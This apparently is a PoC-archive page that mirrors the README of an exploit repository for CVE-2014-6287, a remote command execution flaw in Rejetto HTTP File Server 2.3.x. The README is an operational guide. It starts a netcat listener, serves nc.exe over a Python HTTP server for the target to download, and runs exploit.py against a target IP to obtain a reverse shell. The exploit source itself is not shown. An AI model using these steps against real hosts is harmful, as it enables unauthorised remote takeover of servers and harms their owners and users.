关联漏洞
描述
This repository contains Detailed explanation and working poc for Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution.
介绍
# rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287
This repository contains Detailed explanation and working poc for Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution.
## Configuration:
Create a netcat listner.
```python
nc -lnvp 1234
```
Change the attacker ip to your ip and port.

Also create a http file server on the same directory where `nc.exe` exists.
```python
python -m http.server 80
```
## Usage:
```python
python exploit.py <target-ip> <target-port>
```

> Note: You may need to run the payload multiple time to get a reverse shell.
>
## Reference
---
https://www.exploit-db.com/exploits/39161
https://www.exploit-db.com/exploits/34668
https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/
文件快照
[4.0K] /data/pocs/7b03dacc059d433eeaebaecf648413ce21a1a502
├── [2.4K] exploit.py
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。